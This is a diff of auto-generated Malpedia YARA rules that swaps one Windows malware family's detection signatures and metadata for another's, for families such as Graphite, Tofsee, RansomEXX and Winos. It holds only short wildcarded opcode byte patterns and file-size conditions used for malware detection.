 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "df99256a-ac37-54eb-b09f-1730ead584e4"
+		id = "92a36b55-e0d9-554d-851b-77dda3f7bbeb"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.new_ct"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.new_ct_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bert"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bert_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "9eac271e285948f56968d4730b1030e87fbe78a87c978d4507ea0ec6208dc34d"
+		logic_hash = "a6e868967ddeea2e01bd4f16c21024fbdee2d69c00cbdbbbdfda193aebc93a0a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -144479,32 +144314,32 @@ rule MALPEDIA_Win_New_Ct_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7428 a1???????? 8d8c2478020000 50 68???????? 68???????? }
-		$sequence_1 = { 83fe06 0f8f1f010000 83fe03 0f8e16010000 8b4508 803805 0f850a010000 }
-		$sequence_2 = { 81ec00040000 53 56 6888030000 33db }
-		$sequence_3 = { 8b8680030000 8d542414 52 03c7 6800400000 50 53 }
-		$sequence_4 = { 68???????? 8bce e8???????? 89b5b0f3ffff 89b5b4f3ffff 85f6 7410 }
-		$sequence_5 = { 8944242c 8d542430 89442430 51 89442438 52 89442440 }
-		$sequence_6 = { 50 68???????? 6a10 68???????? ffd3 }
-		$sequence_7 = { f3a4 8dbdccfdffff 83c9ff 33c0 f2ae f7d1 49 }
-		$sequence_8 = { 8b5508 8b420c 85c0 740f 8985c8f6ffff 50 }
-		$sequence_9 = { f3a4 b900010000 8dbc2470020000 f3ab }
+		$sequence_0 = { ffd0 488945e8 488b45e8 488945e0 }
+		$sequence_1 = { 0fb74006 0fb7c0 3945f4 0f8c5efeffff 488b45b8 }
+		$sequence_2 = { e8???????? 488945f8 488b45f8 4889c1 e8???????? 488945c8 }
+		$sequence_3 = { 488b8558ffffff 4889c1 488b05???????? ffd0 }
+		$sequence_4 = { c745f000000000 e9???????? 8b45f0 4863d0 4889d0 48c1e002 }
+		$sequence_5 = { 48898570ffffff 8b45d0 4863d0 4889d0 48c1e002 4801d0 }
+		$sequence_6 = { 4883ec10 48894d10 48895518 488b4510 488945f8 488b4518 }
+		$sequence_7 = { 488945d8 488b45d8 480508010000 488945d0 48c745f800000000 }
+		$sequence_8 = { 4801d0 8b4008 89c1 488d9524ffffff }
+		$sequence_9 = { 48c1e810 0fb7c0 4801c2 488b8578ffffff 488910 eb21 488b8578ffffff }
 
 	condition:
-		7 of them and filesize < 122880
+		7 of them and filesize < 50176
 }
-rule MALPEDIA_Win_Lethic_Auto : FILE
+rule MALPEDIA_Win_Graphite_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3babd57d-d49b-5fd8-b851-cfcf000e34be"
+		id = "22d6771d-6e02-5bad-92aa-7abf2f0540bc"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lethic"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lethic_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphite"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.graphite_auto.yar#L1-L109"
 		license_url = "N/A"
-		logic_hash = "b68d77c1a72e1fca1c5c9d72302fcacf09ed698f69d0c7903522cd1a657700c5"
+		logic_hash = "fac8314c02add0a1a3fcfc7bc6cd359f12eb58a8246911250bf475b51a803e3f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -144518,32 +144353,32 @@ rule MALPEDIA_Win_Lethic_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b550c 8955f8 8b45f8 034510 8945f4 }
-		$sequence_1 = { c7823410000001000000 6a10 8b450c 50 8b4dfc 83c108 51 }
-		$sequence_2 = { 8945fc 8b4dfc 894df0 8b550c }
-		$sequence_3 = { ffd1 33c0 eb42 6a10 }
-		$sequence_4 = { 8b08 890a 8b55fc 8b02 8945fc 8b4df4 51 }
-		$sequence_5 = { 8b55fc 83c208 52 8b45fc 8b4818 51 }
-		$sequence_6 = { 33c0 e9???????? 8b45fc 8b4d10 894804 8b55fc c7823410000001000000 }
-		$sequence_7 = { 890a 8b55fc 8b02 8945fc 8b4df4 51 8b55f8 }
-		$sequence_8 = { 894df8 8b55fc 3b55f8 7411 8b45fc c60000 }
-		$sequence_9 = { 8b55fc c7823410000001000000 6a10 8b450c 50 8b4dfc 83c108 }
+		$sequence_0 = { 85db 7513 33d2 e8???????? 84c0 }
+		$sequence_1 = { 7513 33d2 e8???????? 84c0 }
+		$sequence_2 = { 81e2ff030000 81e1bf030000 83c940 c1e10a }
+		$sequence_3 = { 81e2ff030000 81e1bf030000 83c940 c1e10a 0bca }
+		$sequence_4 = { 85db 7513 33d2 e8???????? }
+		$sequence_5 = { 81e1bf030000 83c940 c1e10a 0bca }
+		$sequence_6 = { 85db 7513 33d2 e8???????? 84c0 74e4 }
+		$sequence_7 = { 7513 33d2 e8???????? 84c0 74e4 }
+		$sequence_8 = { 33d2 e8???????? 84c0 74e4 }
+		$sequence_9 = { ff15???????? 33c0 eb05 b801010000 }
 
 	condition:
-		7 of them and filesize < 81920
+		7 of them and filesize < 98304
 }
-rule MALPEDIA_Win_Devopt_Auto : FILE
+rule MALPEDIA_Win_Obscene_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c196c87a-940f-5170-bdeb-5480f0772987"
+		id = "de7d43f1-261f-57f6-aed2-154950ae43ae"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.devopt"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.devopt_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.obscene"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.obscene_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "d44283c361e67f2f245bfc24e6c20517af3480cb8098b2e4e26bd4743afb76d5"
+		logic_hash = "69b57f278cfe3402f37b22931c479ec832951485342c04942f09cb1c1b23263c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -144557,32 +144392,32 @@ rule MALPEDIA_Win_Devopt_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb47 8b45fc 0fb6809e030000 50 8b45fc 8a889d030000 8b45fc }
-		$sequence_1 = { ff15???????? 8b45f4 8d4060 50 6863090000 6a00 6a09 }
-		$sequence_2 = { eb0f 8b45fc 8b4050 8b55fc 8b4dfc ff514c 89ec }
-		$sequence_3 = { f77dac 0fb755cc 8d0410 66894588 0fb745c6 0fb755ce 29d0 }
-		$sequence_4 = { eb36 807dd8b3 7530 0fb645d4 2d80000000 83f824 7322 }
-		$sequence_5 = { ff526c 8845f0 660fb645f0 66250100 66a9ffff 7502 eb09 }
-		$sequence_6 = { eb2a 6a00 8d45e8 50 66b90000 66ba0000 66b80000 }
-		$sequence_7 = { eb46 8b45fc 8b4034 8b55fc 8b4dfc 8b4934 ff91fc000000 }
-		$sequence_8 = { e8???????? 8d7600 b801000000 89f1 d3e0 8d50ff 21da }
-		$sequence_9 = { ff75c0 8b4dbc 8b55c4 8d45ec e8???????? 84c0 7509 }
+		$sequence_0 = { 68???????? 6a00 6a00 ff15???????? eb09 }
+		$sequence_1 = { ff75f0 ff15???????? 50 68c03d1010 e8???????? }
+		$sequence_2 = { 0fbe00 83f830 7c0b 8b45f8 }
+		$sequence_3 = { 6828431010 68e4401010 e8???????? 59 59 682c431010 }
+		$sequence_4 = { 6a06 68???????? ff35???????? 6aff ff15???????? 68???????? }
+		$sequence_5 = { eb61 68???????? 68???????? 68???????? e8???????? 83c40c 68???????? }
+		$sequence_6 = { ff750c e8???????? 59 3da0bb0d00 733e ff75fc 6800080000 }
+		$sequence_7 = { 59 ff7508 6860ad0010 e8???????? 59 59 68bc501010 }
+		$sequence_8 = { c605????????68 c705????????d15aaa00 c605????????c3 8d45fc 50 6a06 }
+		$sequence_9 = { 55 8bec 81ec04080000 68???????? ff750c e8???????? 59 }
 
 	condition:
-		7 of them and filesize < 4645888
+		7 of them and filesize < 2170880
 }
-rule MALPEDIA_Win_Rook_Auto : FILE
+rule MALPEDIA_Win_Tofsee_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "260fb3cd-c612-5c83-b4f7-79756559f934"
+		id = "5ec9c841-1425-53ec-b84c-3ac0dbb9536e"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rook"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rook_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tofsee"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tofsee_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "c73a208061affa8ef6930cc993d1e8f8eb5228d371bb421012877d9aae5cbf16"
+		logic_hash = "a6df759b6d2a0e48c553f18c939a733af072972aeea2dd4dbecf6d38d79b3015"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -144596,32 +144431,32 @@ rule MALPEDIA_Win_Rook_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ffc3 4883c708 83fb22 72df 498bd6 488bcd ff15???????? }
-		$sequence_1 = { 0f8521ffffff 44882b eb7b 488b9540070000 4c8d05979e0000 498bce }
-		$sequence_2 = { 33d2 ff15???????? 488b0d???????? 4d8bc7 33d2 ff15???????? 833d????????00 }
-		$sequence_3 = { ff15???????? 488bce e8???????? 488d542440 488bcd ff15???????? 85c0 }
-		$sequence_4 = { 4883ec38 488d05f5990000 41b91b000000 4889442420 e8???????? 4883c438 c3 }
-		$sequence_5 = { 498bd6 4d8d8115cc0400 4d03c4 0f1f4000 410fb64410ff 3cff 740b }
-		$sequence_6 = { c605????????63 4c8d250099ffff b8ff000000 4d8d4901 }
-		$sequence_7 = { 498bcd 4c89bc2458270000 ff15???????? 488b0d???????? 4d8bc5 33d2 4c8be0 }
-		$sequence_8 = { 8bd9 4c8d0dddce0000 b904000000 4c8d05c9ce0000 488d15b2bb0000 e8???????? }
-		$sequence_9 = { 4863c8 4c8d4c2450 48894c2420 e8???????? 488d4c2450 ff15???????? }
+		$sequence_0 = { 6864006400 ff7510 ff15???????? 85c0 7404 }
+		$sequence_1 = { 5e c3 55 8bec 83ec14 8365f400 8365f800 }
+		$sequence_2 = { 57 8d8580fbffff eb68 03d8 81fbf4010000 0f8f92000000 }
+		$sequence_3 = { 85c9 8816 7ff0 017dfc eb13 8b45ec }
+		$sequence_4 = { 51 50 53 e8???????? 8b4c241c 8b413c 56 }
+		$sequence_5 = { ff75fc e8???????? 83c40c 56 ff75f8 8d45d4 6a03 }
+		$sequence_6 = { 8b4e10 85c9 7412 33d2 f7f1 894df8 8945fc }
+		$sequence_7 = { e9???????? 68???????? ff7514 e8???????? 59 59 83fb05 }
+		$sequence_8 = { 391e 895dbc 8975f4 7e7f 83c608 bf???????? 8b46fc }
+		$sequence_9 = { 0f8498000000 8b4510 8938 8b450c 8d4801 8a10 40 }
 
 	condition:
-		7 of them and filesize < 843776
+		7 of them and filesize < 147456
 }
-rule MALPEDIA_Win_Ascentloader_Auto : FILE
+rule MALPEDIA_Win_Ehdevel_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4372eef6-4656-5e4d-b175-471d65d2d6f2"
+		id = "a1927287-a7a0-56db-9215-479d35c403c1"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ascentloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ascentloader_auto.yar#L1-L115"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ehdevel"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ehdevel_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "3968524e74d1c6dce6af2edd09bc8b40e402c007d240f6b355af76ae453cb02a"
+		logic_hash = "684d7241cee866804960efb3b0b6928989858b77ba794c784761214d04fdf763"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -144635,32 +144470,32 @@ rule MALPEDIA_Win_Ascentloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { b8???????? eb0a b900240000 b8???????? }
-		$sequence_1 = { 8b4df4 e8???????? 57 ff15???????? ff15???????? }
-		$sequence_2 = { 8bf8 897dd8 85ff 7516 83c8ff e9???????? c745e440ac4100 }
-		$sequence_3 = { 740b 8b55e8 8b4dfc e8???????? 8b4dfc }
-		$sequence_4 = { 8955fc 83b88400000000 0f86ea000000 56 8bb080000000 }
-		$sequence_5 = { c744243a62756700 ff15???????? 8b35???????? ffd6 }
-		$sequence_6 = { 57 68000000f0 6a01 33db 894de8 53 }
-		$sequence_7 = { 3b4814 7604 33c0 eb14 8b45fc 8b4df8 03481c }
-		$sequence_8 = { e8???????? 8b4d10 8bd0 8b4514 }
-		$sequence_9 = { 005caa40 0023 d18a0688078a 46 }
+		$sequence_0 = { 33c5 8945fc 57 8bf9 8d85ece7ffff 50 8d8dfcf7ffff }
+		$sequence_1 = { 85c0 7524 a1???????? a3???????? a1???????? c705????????d22f0110 8935???????? }
+		$sequence_2 = { 51 e8???????? 83c40c 56 8d95e8fbffff 6804010000 }
+		$sequence_3 = { 8b3d???????? c60301 ffd7 56 ff15???????? 56 ffd7 }
+		$sequence_4 = { 8985e8f7ffff 897e10 897e14 c645fc03 399d94f7ffff 720f 8b8d80f7ffff }
+		$sequence_5 = { 8d8dfcf7ffff 51 e8???????? 83c410 84c0 7502 32db }
+		$sequence_6 = { 8b8dd48bffff 6a00 6880000000 6a04 6a00 6a00 6a04 }
+		$sequence_7 = { eb19 8b4c2414 8b4904 8b440c4c 8d4c0c14 f7d8 }
+		$sequence_8 = { 33d2 8955fc 3bca 7458 33f6 52 c7411407000000 }
+		$sequence_9 = { c745f463006f00 c745f86d000000 e8???????? 3c01 7441 }
 
 	condition:
-		7 of them and filesize < 253952
+		7 of them and filesize < 524288
 }
-rule MALPEDIA_Win_Industrial_Spy_Auto : FILE
+rule MALPEDIA_Win_Transferloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "49532f61-1558-5e03-9771-9daa1443f81c"
+		id = "6881fadd-235e-58e1-86ed-39c1ca8da641"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.industrial_spy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.industrial_spy_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.transferloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.transferloader_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "09d68278c920c888a9a9161c0ac726f167f616f36cff9042eab3321dfe0c396f"
+		logic_hash = "c6b3fd0089b61d2c316b9ea19bd98256a6361edd3a6f033006f4e490787182fc"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -144674,32 +144509,32 @@ rule MALPEDIA_Win_Industrial_Spy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 03c8 43890c26 3bc8 7302 ffc7 037c242c }
-		$sequence_1 = { 33c9 ff15???????? 8b15???????? 4c8d0577020200 498904d0 ffc2 8915???????? }
-		$sequence_2 = { 418bd9 498bf8 8bf2 4c8d0d2d9c0000 488be9 4c8d051b9c0000 }
-		$sequence_3 = { 4403d3 41c1ca0c 4503d1 4133c2 054239faff 0345d4 03d0 }
-		$sequence_4 = { 8bc1 488bce 4803d0 e8???????? 33c0 eb0c b801040000 }
-		$sequence_5 = { 442bc9 f7d1 443bc9 418bc0 0f46d6 c1e010 }
-		$sequence_6 = { 0345c0 418d91442229f4 03d0 448d8997ff2a43 418bc2 c1c206 f7d0 }
-		$sequence_7 = { 418d4a01 418bc1 c1e810 03c2 }
-		$sequence_8 = { 33c0 eb3d 452bd3 4533c0 4585c9 742f 482bf9 }
-		$sequence_9 = { 488d0d4bf40000 48894b48 4963d0 c6435401 e8???????? eb18 4885c9 }
+		$sequence_0 = { 0fb609 880c02 e9???????? 48837c244800 7412 4c8b442448 33d2 }
+		$sequence_1 = { 4889442438 41b810000000 488b542438 488b4c2430 }
+		$sequence_2 = { 88440c20 b801000000 486bc002 b901000000 486bc901 }
+		$sequence_3 = { 488d442424 48898424f8000000 488d442420 4889842400010000 }
+		$sequence_4 = { b903000000 f3aa 48b8bce015361abafbff 48898424c8000000 c744242c00000000 486344242c }
+		$sequence_5 = { 4889842498010000 488b842490010000 4889842468010000 c6442440eb c644244108 c644244248 c644244389 }
+		$sequence_6 = { 488b09 4863493c 480308 488bc1 4889442430 488b442430 }
+		$sequence_7 = { 4889542410 48894c2408 4881eca8000000 c6442420eb c644242108 }
+		$sequence_8 = { 488b442420 4889442428 488b442428 0fb700 3d4d5a0000 7404 32c0 }
+		$sequence_9 = { 488b8c2420010000 ff15???????? 4883bc24e000000000 7418 4c8b8424e0000000 33d2 }
 
 	condition:
-		7 of them and filesize < 339968
+		7 of them and filesize < 216064
 }
-rule MALPEDIA_Win_Dnespy_Auto : FILE
+rule MALPEDIA_Win_Nullmixer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "99cbf088-6549-56a2-969b-60e6f7eba155"
+		id = "07ba7e58-2a57-502b-80f6-37285125f4cb"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnespy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dnespy_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nullmixer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nullmixer_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "4e1c2bd2efe3fbaf06ba8ff5d9f3d8607a9e5d8c5f87336409321d599b08c5ad"
+		logic_hash = "ef3e886b25db0cbcc96c6b82a5addac8533ba94ae036aa8c2ef621bf053010dc"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -144713,32 +144548,32 @@ rule MALPEDIA_Win_Dnespy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b54240c a1???????? 89542414 81faff0f0000 762d 0f1f00 ff774c }
-		$sequence_1 = { 83f80a 0f85e6080000 834608fc 8b55dc 85d2 791b 8bc2 }
-		$sequence_2 = { 894618 837e0cff 7403 ff4e24 8bce e8???????? 8b4e0c }
-		$sequence_3 = { 83f9ff 7245 880a 0facc108 c1e808 884a01 0facc108 }
-		$sequence_4 = { 8975b4 c745b80f000000 c645a400 8d8de8feffff e8???????? 8b531c 83fa10 }
-		$sequence_5 = { 33c9 c645fc02 8b45e4 85c0 0f95c1 8d0c8d04000000 034d10 }
-		$sequence_6 = { e9???????? 6a00 57 53 ff762c 56 e8???????? }
-		$sequence_7 = { 3bc3 7304 8bc3 eb0b 3dffffff3f 0f87ca000000 }
-		$sequence_8 = { 8be8 8bc2 eb16 8b4618 53 ff761c }
-		$sequence_9 = { 6a20 c745e400000000 e8???????? 0f104588 8bc8 c745e400000000 8b45b0 }
+		$sequence_0 = { 85f6 0f8ed1000000 894c2418 8b7b68 c1e603 31d2 895c241c }
+		$sequence_1 = { e9???????? 8b4500 89e9 ff5028 8b442418 8b7c2454 8b5804 }
+		$sequence_2 = { 89ce 0f8586010000 38d0 0f84b9010000 0fb7442464 8b4c2460 6683f8ff }
+		$sequence_3 = { 8b45bc 85c0 0f8536020000 807dc001 0f842c020000 8b4520 31c9 }
+		$sequence_4 = { 83ec08 0fb6442420 8b7c2428 c7042400000000 8b542430 88442407 8b442424 }
+		$sequence_5 = { e8???????? 8b44243c b925000000 8b10 8b5218 81fa???????? 0f842bffffff }
+		$sequence_6 = { ff5210 0fbe17 89e9 89c3 8b4500 83ec04 891424 }
+		$sequence_7 = { e8???????? b902000000 89c6 89c3 f3a6 0f97c0 1c00 }
+		$sequence_8 = { 0f85baf9ffff 0fb7550c 8d4508 e8???????? 89c3 0fb64610 e9???????? }
+		$sequence_9 = { 8b842488000000 8b942494000000 8b00 894c2404 8954240c 8b8c2480000000 8b942490000000 }
 
 	condition:
-		7 of them and filesize < 794624
+		7 of them and filesize < 2351104
 }
-rule MALPEDIA_Win_Cycbot_Auto : FILE
+rule MALPEDIA_Win_Ransomexx_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "aad0afc1-3e31-5a15-bed5-ae0a7936ed7d"
+		id = "094b727d-6615-5ea8-8297-ce60c4df65db"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cycbot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cycbot_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomexx"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ransomexx_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "653a5c288b88440ecab3bfd86c4c4b0d9e0fe555f9cf936dfb136b22da063d90"
+		logic_hash = "88fc0fd7827f895e1a84baf4a50e5e79c472c52e50515dafeb1f3f74d8cf643c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -144752,32 +144587,32 @@ rule MALPEDIA_Win_Cycbot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c705????????480f4200 8935???????? a3???????? ff15???????? a3???????? 83f8ff 0f84c1000000 }
-		$sequence_1 = { 895dfc 51 8d4db8 8945cc 895dc8 885db8 e8???????? }
-		$sequence_2 = { 741a ff7590 ff15???????? 85c0 750d ff7590 e8???????? }
-		$sequence_3 = { c68424c805000001 e8???????? 53 6a01 8d4c2474 8bf0 }
-		$sequence_4 = { e8???????? 83c418 6a00 8d842488000000 50 8d8c2494010000 51 }
-		$sequence_5 = { 48 7514 8d8550ffffff eb08 8d45c8 eb03 8d45a0 }
-		$sequence_6 = { 59 898580deffff 3bc7 7433 83bd9cdeffff10 8b8588deffff 7306 }
-		$sequence_7 = { 50 ff5110 8985b4fbffff 3bc7 0f857e010000 8b85a8fbffff 8b08 }
-		$sequence_8 = { 50 8d4c2430 e8???????? 8bf0 59 3bf3 752f }
-		$sequence_9 = { 33c0 66898580fbffff 6a04 5b 899dbcfbffff c785c0fbffff02000000 899dc4fbffff }
+		$sequence_0 = { c1eb08 81e3ff000000 333c9db07a4200 8b5dec }
+		$sequence_1 = { 8a10 881406 40 49 75f7 8b7df0 }
+		$sequence_2 = { 8b0d???????? 6a04 8d45e8 6a00 50 ffd1 }
+		$sequence_3 = { 6a00 ff15???????? 85c0 7415 0fb745e0 8b0d???????? }
+		$sequence_4 = { 8d3c8500000000 8b0417 53 50 ff15???????? eb31 }
+		$sequence_5 = { b801000000 8945dc 8945e0 33f2 }
+		$sequence_6 = { 3b45ec 729b 8b4d10 8b5104 8955fc }
+		$sequence_7 = { 8d5df4 8d75e0 8bc3 e8???????? 8bf0 85f6 }
+		$sequence_8 = { b16c c7006e74646c c740046c2e646c 884808 50 ff15???????? }
+		$sequence_9 = { e8???????? 83c404 85c0 7520 8b4dfc f7d9 890f }
 
 	condition:
-		7 of them and filesize < 1163264
+		7 of them and filesize < 372736
 }
-rule MALPEDIA_Win_Purelocker_Auto : FILE
+rule MALPEDIA_Win_Winos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "19f36305-4b96-510d-a7f2-0dc1a52c7e21"
+		id = "ab76e8bd-21bc-5539-b1fb-f47fdb274949"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.purelocker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.purelocker_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.winos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.winos_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "938c4b6e5f7cc834fc68e23dd33e35b757eeea1e164b3c0af40b39e69fc933d6"
+		logic_hash = "e8eeb814a2c5b4ab9f10ee5708c1f0bfd3c156bc0fa60e8429c570c21e8f598c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -144791,32 +144626,32 @@ rule MALPEDIA_Win_Purelocker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8f84240c040000 ffb42410040000 58 89842420040000 8b9c2414040000 3b9c240c040000 0f8da5000000 }
-		$sequence_1 = { 50 5b 5f 83ffff 7f0b 7c05 83fbff }
-		$sequence_2 = { e8???????? ffb42458080000 e8???????? 31c0 0fbec0 }
-		$sequence_3 = { 7505 e9???????? 8b9c2450040000 83fb01 0f85c3000000 83bc245804000000 7411 }
-		$sequence_4 = { 89442404 ff3424 8d1524400110 59 e8???????? 7415 }
-		$sequence_5 = { 750e 837c240400 7407 b801000000 eb02 31c0 21c0 }
-		$sequence_6 = { 7c11 8b5c2420 3b5c2428 7f07 b801000000 eb02 }
-		$sequence_7 = { e9???????? 6819000000 68ffffffff ff742414 ff742420 e8???????? ff742410 }
-		$sequence_8 = { 52 e8???????? 5a 50 ff742408 e8???????? 8d44241c }
-		$sequence_9 = { ffb424bc000000 e8???????? 0fbe842488000000 0fbec0 e9???????? ff742474 }
+		$sequence_0 = { 66890c70 5e 8bc7 5f 5b 5d c20800 }
+		$sequence_1 = { eb0d 8d95bcfbffff 52 ff15???????? 8b85bcfbffff b906000000 663bc8 }
+		$sequence_2 = { 8d8de0fcffff 57 51 e8???????? 8b1d???????? }
+		$sequence_3 = { 83c40c 899c2460040000 33db 8d4c243c 51 89bc246c040000 }
+		$sequence_4 = { 2bd6 c1fa02 899530feffff 3bdf 7563 8bc3 }
+		$sequence_5 = { 8d4db8 50 8b853cffffff 50 }
+		$sequence_6 = { 8b442418 53 52 6a03 6a00 56 }
+		$sequence_7 = { c70009000000 e8???????? ebda 8bc3 c1f805 8d3c8540310310 8bf3 }
+		$sequence_8 = { 5d c3 55 8bec 8b4e10 }
+		$sequence_9 = { db45cc d84dc8 e8???????? 8b7dbc 8bf0 8945c4 6a4c }
 
 	condition:
-		7 of them and filesize < 193536
+		7 of them and filesize < 457728
 }
-rule MALPEDIA_Win_Adkoob_Auto : FILE
+rule MALPEDIA_Win_Stration_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "bebf573b-46be-5024-b08d-6d19c81fe200"
+		id = "41dc722e-36ee-57b1-9a26-7229c2369407"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.adkoob"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.adkoob_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stration"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.stration_auto.yar#L1-L114"
 		license_url = "N/A"
-		logic_hash = "9df45dbba7685f4e50394d5dc1c9c28bf484da1b0409fe46575f0443f2099dc5"
+		logic_hash = "e64d83d58a5476627a814f6a3e2d0bd532d00a922e21b2d066d65b8e0bc95a9c"
 		score = 75
 		quality = 75
 		tags = "FILE"
